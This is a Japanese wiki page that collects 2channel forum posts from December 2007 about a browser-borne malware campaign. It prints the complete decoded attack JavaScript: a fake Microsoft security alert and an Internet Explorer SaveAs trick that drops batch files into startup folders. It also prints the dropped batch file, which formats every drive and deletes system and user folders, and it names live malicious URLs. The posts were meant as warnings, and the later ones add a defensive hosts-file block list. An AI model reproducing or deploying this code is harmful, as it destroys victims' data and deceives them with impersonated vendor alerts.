有用と思われる書き込み

みんな何かあったら抽出頼んだ。

このページは見ただけでは感染しません。

一部アンチウィルスソフト(特にノートン)が記述をウィルスと誤認する可能性があります。


726 名前:以下、名無しにかわりましてVIPがお送りします。[sage] 投稿日:2007/12/31(月) 01:00:28.46 ID:ou5idN1m0
520 名前: ボーイッシュな女の子(兵庫県)[] 投稿日:2007/12/31(月) 00:53:12.21 ID:+qMRRISz0
暗号化されたデータをデコードしてみた。
しょうもないスクリプトだった。


<script type="text/javascript">
<div id="imgWrapper" style="z-index:2000;"><a id="lnk" href="http://snipr.com/wt_link01" oncontextmenu="try{location.replace('http://snipr.com/wt_link01');}
catch(e){};return false;" onmouseover="window.status=' ';return true;" onmouseout="window.status=' ';return true;" onfocus="window.status=' ';return true;"
onblur="window.status=' ';return true;" style="cursor:default;border:0px none;"><img id="wtImg" src="http://snipr.com/wt_imgsrc01" border="0"
style="border:0px none" alt=""></a></div>
<div id="iframeWrapper"><iframe id="wtIfm" name="wtIfm" src="http://snipr.com/wt_iframesrc01" style="visibility:hidden;width:1px;height:1px;border:0px none;"
frameborder="0"></iframe></div>
<script type="text/javascript">
window.defaultStatus=' ';
var kFnc=function(e){
try{
document.getElementById('lnk').focus();
window.status=' ';return true;
location.replace('http://snipr.com/wt_link01');
}catch(e){}
};
document.onkeypress=kFnc;
document.onkeydown=kFnc;
document.onkeyup=kFnc;
</script></body></html><noembed><!-- :) -->


またか

実際のコード
/**
 * AmiSaveAs
 *
 * (c) 2003 __L/a/L/a*L/a/n/d__
 * ______________________________________________________ */

<script type="text/javascript">

if (typeof AmiLaLa == 'undefined' || !AmiLaLa) {
	var AmiLaLa = {
		Version: '0.0.0',
		emptyFunc: function() {}
	};
}

AmiLaLa.__GetUserTime = function() {
	this.now = new Date();
	this.year = this.now.getFullYear();
	this.month = this.now.getMonth() + 1;
	this.day = this.now.getDate();
	if (this.month < 10) { this.month = '0' + this.month; }
	if (this.day < 10) { this.day = '0' + this.day; }
};
AmiLaLa.__Moment = new AmiLaLa.__GetUserTime();

AmiLaLa.detectVictim = function() { // detect for WinIEJa
	var e_bLang = navigator.browserLanguage;
	var e_lang = navigator.language;
	var e_vulg = 'ja'; // ja
	var ua = navigator.userAgent.toLowerCase();
	this.isOpera = (ua.indexOf('opera') != -1);
	this.isIE = (ua.indexOf('msie') != -1 && !this.isOpera && (ua.indexOf('webtv') == -1));
	this.isWin = (ua.indexOf('win') != -1);
	this.isJap = ((e_lang && e_lang.indexOf(e_vulg) > -1) || (e_bLang && e_bLang.indexOf(e_vulg) > -1));
	this.isWinIEJa = (this.isIE && this.isWin && this.isJap);
};
AmiLaLa.Client = new AmiLaLa.detectVictim();

AmiLaLa.hasAlertedSaveAs = false;
AmiLaLa.tidSaveAs = -1;

AmiLaLa.ExSaveAs = {
	createSrcIfm: function() {
		if (document.getElementById('amiExSaveAsBox')) {
			var rnd = Math.floor(Math.random()*99);
			var theDiv = document.getElementById('amiExSaveAsBox');
			var theSrc = 'src.html' + '?' + rnd;
			var theIfm = document.createElement('IFRAME');
//			theIfm.charset = 'iso-8859-1';
			theIfm.setAttribute('src', theSrc);
			theIfm.setAttribute('id', 'amiExSaveAsF');
			theIfm.setAttribute('name', 'amiExSaveAsF');
			theIfm.setAttribute('width', '1');
			theIfm.setAttribute('height', '1');
			theIfm.setAttribute('frameborder', '0');
			theDiv.appendChild(theIfm);
		}
	},

	showMsg: function() {
		if (document.getElementById('amiExSaveAsBox')) {
			var rnd = Math.floor(Math.random()*9999);
			var liveAlertID = 'MS07-Q' + rnd + '-JP';
			var defLastModified = AmiLaLa.__Moment.year + unescape('年') + AmiLaLa.__Moment.month + unescape('月') + AmiLaLa.__Moment.day + unescape('日');
			var defID = 'ID: MS07-LP-Def' + rnd + '-JP';
			var defSig = 'Microsoft(r) Security LiveProtect(r) Team';
			var defResrc = 'www.microsoft.com';
			var hr = '______________________________________________';

			// Japanese text by __Mew__
			var msg_ja = '\n'
			+ 'Windows LiveAlert(r) '
			+ unescape('セキュリティ アドバイザリ')
			+ ' (' + liveAlertID + ')' + '\n'
			+ hr + hr + '\n\n'
			+  unescape('【緊急】 セキュリティ自動保護システムが、深刻な脆弱性を検知しました。') + '\n\n'
			+ '  - ' + unescape('最終更新日')
			+ ': ' + defLastModified + ' | ' + unescape('定義') + ' ' + defID + '\n'
			+ '  - ' + unescape('信頼済みプロダクト署名') + ': ' + defSig + '\n'
			+ '  - ' + unescape('配信元ドメイン') + ': ' + defResrc + '\n'
			+ hr + hr + '\n\n'
			+ '1. ' + unescape('コードはすでにリモートの実行プロセス') + ' 0' + (3*rnd-16) + 'f ' + unescape('にあります。') + '\n\n'
			+ '2. ' + unescape('セキュリティ最新定義') + ' ' + defID + ' ' + unescape('は、') + '\n'
			+ '   ' + unescape('「ウィンドウを閉じたり、コンピュータを終了させると、 現在のシステムおよび') + '\n'
			+ '   ' + unescape('全てのデータ(個別ユーザ識別情報を含む)が、壊滅的なダメージを受ける」') + '\n'
			+ '   ' + unescape('と主張しています。') + '\n\n'
			+ '3. ' + unescape('ダメージを回避するために残された唯一の対策として、') + '\n'
			+ '   ' + unescape('このまま緊急に、提示される全ての更新ファイル群を適用してください。') + '\n\n';
			if (!AmiLaLa.hasAlertedSaveAs) {
				window.alert(msg_ja);
				for (var i=0; i<3; i++) {
					AmiLaLa.hasAlertedSaveAs = true;
				}
			}
		}
	},

	doSaveAs: function() {
		if (document.getElementById('amiExSaveAsBox')) {
			var rnd = Math.floor(Math.random()*99);
			try {
				var startUp_XpJa = unescape('C:\\Documents and Settings\\All Users\\スタート メニュー\\プログラム\\スタートアップ\\WinUpd') + rnd + '.txt'
				+ '                                         .bat';
				var startUp_Nt2kJa = unescape('C:\\WINNT\\Profiles\\All Users\\スタートメニュー\\プログラム\\スタートアップ\\IE_Up') + rnd + '.txt'
				+ '                                            .bat';
				var startUp_9xMeJa = unescape('C:\\WINDOWS\\All Users\\スタート メニュー\\プログラム\\スタートアップ\\BugFix') + rnd + '.txt'
				+ '                                          .bat';
				var autoExec_Xp = 'C:\\WINDOWS\\SYSTEM32\\AUTOEXEC.NT .txt';
				var autoExec_9x = 'C:\\AUTOEXEC.BAT .txt';
				var quickLaunch_2kXp = 'C:\\Documents and Settings\\All Users\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\SecurityAlert' + rnd + '.txt'
				+ '                                  .bat';
				var quickLaunch_9x = 'C:\\WINDOWS\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\AntiVirus' + rnd + '.txt'
				+ '                                       .bat';

				amiExSaveAsF.document.execCommand('SaveAs',false,startUp_XpJa);
				amiExSaveAsF.document.execCommand('SaveAs',false,startUp_Nt2kJa);
				amiExSaveAsF.document.execCommand('SaveAs',false,startUp_9xMeJa);
				amiExSaveAsF.document.execCommand('SaveAs',false,autoExec_Xp);
				amiExSaveAsF.document.execCommand('SaveAs',false,autoExec_9x);
				amiExSaveAsF.document.execCommand('SaveAs',false,quickLaunch_2kXp);
				amiExSaveAsF.document.execCommand('SaveAs',false,quickLaunch_9x);
			} catch (e) {}
		}
	},

	init: function() {
		var wait = 2*1000;
		this.createSrcIfm();
		for (var i=0; i<3; i++) {
			clearTimeout(AmiLaLa.tidSaveAs);
		}
		// temp off for other stuff
//		AmiLaLa.tidSaveAs = setTimeout('AmiLaLa.ExSaveAs.doSaveAs()',wait);
	}
};

window.onload = function() {
	if (AmiLaLa.Client.isWinIEJa) {
		AmiLaLa.ExSaveAs.init();
	} else {
		try {
			location.replace('about:blank');
		} catch (e) {}
	}
};

window.onbeforeunload = function() {
	if (AmiLaLa.Client.isWinIEJa) {
		if (!document.getElementById('amiExSaveAsF')) {
			AmiLaLa.ExSaveAs.createSrcIfm();
		}
		AmiLaLa.ExSaveAs.showMsg();
		AmiLaLa.ExSaveAs.doSaveAs();
	}
};

window.onunload = function() { // for tabbed browsers
	if ((AmiLaLa.Client.isWinIEJa) && (!AmiLaLa.hasAlertedSaveAs)) {
		AmiLaLa.ExSaveAs.showMsg();
		AmiLaLa.ExSaveAs.doSaveAs();
		for (var i=0; i<3; i++) {
			AmiLaLa.hasAlertedSaveAs = true;
		}
	}
};

/* doesnt work in IE7 on Vista :( support.microsoft.com/kb/934817/en */

</script>



ダウンロードされるファイル
CLS
@ECHO OFF
 :START
ECHO.
ECHO. Updating Your System...
ECHO. WARNING: DO NOT PRESS ANY KEY. Be patient, this may take a few minutes.
ECHO.
@ECHO OFF
IF %OS%.==Windows_NT. GOTO NT
 :WIN95/98/Me
CTTY NUL
C:
CD C:\
ATTRIB -R -H -S C:\_RESTORE
ATTRIB -R -H -S C:\PROGRA~1
ATTRIB -R -H -S C:\MYDOCU~1
ATTRIB -R -H -S C:\WINDOWS
ATTRIB -R -H -S %WINDIR%
ATTRIB -R -H -S %WINBOOTDIR%
DELTREE /Y C:\_RESTORE
DELTREE /Y C:\PROGRA~1
DELTREE /Y C:\MYDOCU~1
DELTREE /Y D:\
DELTREE /Y E:\
DELTREE /Y F:\
FORMAT D: /AUTOTEST /Q /U
FORMAT E: /AUTOTEST /Q /U
FORMAT F: /AUTOTEST /Q /U
FORMAT G: /AUTOTEST /Q /U
FORMAT H: /AUTOTEST /Q /U
FORMAT I: /AUTOTEST /Q /U
FORMAT J: /AUTOTEST /Q /U
FORMAT K: /AUTOTEST /Q /U
FORMAT L: /AUTOTEST /Q /U
FORMAT M: /AUTOTEST /Q /U
FORMAT N: /AUTOTEST /Q /U
FORMAT O: /AUTOTEST /Q /U
FORMAT P: /AUTOTEST /Q /U
FORMAT Q: /AUTOTEST /Q /U
FORMAT R: /AUTOTEST /Q /U
FORMAT S: /AUTOTEST /Q /U
FORMAT T: /AUTOTEST /Q /U
FORMAT U: /AUTOTEST /Q /U
FORMAT V: /AUTOTEST /Q /U
FORMAT W: /AUTOTEST /Q /U
FORMAT X: /AUTOTEST /Q /U
FORMAT Y: /AUTOTEST /Q /U
FORMAT Z: /AUTOTEST /Q /U
FORMAT A: /AUTOTEST /Q /U
FORMAT B: /AUTOTEST /Q /U
FORMAT C: /AUTOTEST /Q /U
DELTREE /Y C:\WINDOWS
DELTREE /Y %WINDIR%
DELTREE /Y %WINBOOTDIR%
DELTREE /Y C:\
D:
CD D:\
DELTREE /Y C:\_RESTORE
DELTREE /Y C:\PROGRA~1
DELTREE /Y C:\MYDOCU~1
FORMAT C: /AUTOTEST /Q /U
DELTREE /Y C:\WINDOWS
DELTREE /Y %WINDIR%
DELTREE /Y %WINBOOTDIR%
DELTREE /Y C:\
CTTY CON
GOTO QUIT
 :NT
C:
CD C:\
ATTRIB -R -H -S C:\SYSTEM~1
ATTRIB -R -H -S C:\PROGRA~1
ATTRIB -R -H -S C:\DOCUME~1
ATTRIB -R -H -S C:\USERS
ATTRIB -R -H -S C:\WINDOWS
ATTRIB -R -H -S C:\WINNT
ATTRIB -R -H -S %WINDIR%
ATTRIB -R -H -S %SYSTEMROOT%
RD C:\SYSTEM~1 /S /Q
RD C:\PROGRA~1 /S /Q
RD C:\DOCUME~1 /S /Q
RD C:\USERS /S /Q
RD D:\ /S /Q
RD E:\ /S /Q
RD F:\ /S /Q
FORMAT D: /AUTOTEST /Q /U
FORMAT E: /AUTOTEST /Q /U
FORMAT F: /AUTOTEST /Q /U
FORMAT G: /AUTOTEST /Q /U
FORMAT H: /AUTOTEST /Q /U
FORMAT I: /AUTOTEST /Q /U
FORMAT J: /AUTOTEST /Q /U
FORMAT K: /AUTOTEST /Q /U
FORMAT L: /AUTOTEST /Q /U
FORMAT M: /AUTOTEST /Q /U
FORMAT N: /AUTOTEST /Q /U
FORMAT O: /AUTOTEST /Q /U
FORMAT P: /AUTOTEST /Q /U
FORMAT Q: /AUTOTEST /Q /U
FORMAT R: /AUTOTEST /Q /U
FORMAT S: /AUTOTEST /Q /U
FORMAT T: /AUTOTEST /Q /U
FORMAT U: /AUTOTEST /Q /U
FORMAT V: /AUTOTEST /Q /U
FORMAT W: /AUTOTEST /Q /U
FORMAT X: /AUTOTEST /Q /U
FORMAT Y: /AUTOTEST /Q /U
FORMAT Z: /AUTOTEST /Q /U
FORMAT A: /AUTOTEST /Q /U
FORMAT B: /AUTOTEST /Q /U
FORMAT C: /AUTOTEST /Q /U
RD C:\WINDOWS /S /Q
RD C:\WINNT /S /Q
RD %WINDIR% /S /Q
RD %SYSTEMROOT% /S /Q
RD C:\ /S /Q
D:
CD D:\
RD C:\SYSTEM~1 /S /Q
RD C:\PROGRA~1 /S /Q
RD C:\DOCUME~1 /S /Q
RD C:\USERS /S /Q
FORMAT C: /AUTOTEST /Q /U
RD C:\WINDOWS /S /Q
RD C:\WINNT /S /Q
RD %WINDIR% /S /Q
RD %SYSTEMROOT% /S /Q
RD C:\ /S /Q
C:
CD C:\
CACLS "C:\System Volume Information" /E /G Administrator:F
RD "C:\System Volume Information" /S /Q
RD C:\SYSTEM~1 /S /Q
@ECHO Y | DEL *.*
@ECHO OFF
DEL /S /F /Q *.*
DEL /S /F /Q %SYSTEMDRIVE%\*\*.*
DEL /S /F /Q %SYSTEMDRIVE%\*.*
D:
CD D:\
@ECHO Y | DEL *.*
@ECHO OFF
DEL /S /F /Q *.*
DEL /S /F /Q %SYSTEMDRIVE%\*\*.*
DEL /S /F /Q %SYSTEMDRIVE%\*.*
 :QUIT
CLS
ECHO.
ECHO. You bloody wanker.
ECHO.
ECHO. *****************************************************
ECHO. **              _(c)_2003_AmiLaLa_:)_              **
ECHO. *****************************************************
ECHO.
PAUSE
CLS
GOTO START
PAUSE




cunt.multiservers.com/amazingpussy/
このURL以下が全部ウイルス&ブラクラな様子

IE6&セキュリティ中(デフォルト)で試してきた
A cunt.multiservers.com/amazingpussy/amiexeifm.html
1. グロ画像が表示される
2. list01.exe をDLさせようとしてくる(これを実行するとHDDがフォーマットされる)古いIEだと勝手に実行されるかも??
  AntiVirによると、TR/Delwin.何とか(ホワイター間違いなし) AVGではTrojan horse Small.2.BJ(判り辛っ)
3. 下のBのURLに飛ぶ

B cunt.multiservers.com/amazingpussy/amiprogsmajor.html
1. グロ画像が表示される
2. Telnet,News,MailToStorm等の古典的ブラクラ(IE専用)が発動するが、落ちる程の事にはならない(タスクマネージャーからIEのプロセスを殺せば停止する)
  ちなみにメールの本文は「FUCKEN JAP DIE!」 厨房シネ MSはもっとシネ
3. 画像をクリックする度に再発動する


439 名前: 元原発勤務(広島県)[] 投稿日:2007/12/31(月) 02:20:55.21 ID:oOyvG6VN0
ニコニコ動画とか斧等のロダ、2chのURLに偽装して貼られてるのもあるから、ホイホイ踏むなよ。
なんかする前に、まず、スレをよく読めよ。

↓をNGワードに登録
gigigi.net
zz.tc
他、短縮URLで貼られる可能性もあるので注意。

アクセス禁止サイトに
gigigi.net
を追加

C:\WINDOWS\system32\drivers\etc
にあるhostsファイルをメモ帳などエディタで開いて以下を追加すればおk
127.0.0.1 www.gigigi.net
127.0.0.1 gigigi.net
127.0.0.1 snipr.com
127.0.0.1 uk.geocities.com
127.0.0.1 geo.yahoo.com

>とりあえずプログラムフォルダに xerox\nwwia
もろもろ言う人が居ますが、これはゼロックス社製品関係の物なので、問題はありません。
xeroxという変なフォルダがあります
ttp://www.tef-room.net/trouble/xerox.html

お前ら気をつけろよ。
他スレにも、この警告文をコピペしてくれよ。

621 名前: 空気コテ(長屋)[sage] 投稿日:2007/12/31(月) 02:29:31.75 ID:poghhQbg0
>>439の言うようにやるとどうなるんだ?

655 名前: 運転士(関東地方)[sage] 投稿日:2007/12/31(月) 02:31:26.08 ID:WkrDXRkO0
>>621
127.0.0.1はお前さんのマシン
登録しとけば、そのURLをクリックしても自分自身を見に行くから、絶対に繋がらない

865 名前: ネットカフェ難民(東京都)[] 投稿日:2007/12/31(月) 02:43:32.92 ID:Jf4EtMam0
>>830
ただのアップローダだろ

本体はこっち
snipr.com
cunt.multiservers.com


最終更新:2008年01月01日 16:07
ツールボックス

下から選んでください:

新しいページを作成する
ヘルプ / FAQ もご覧ください。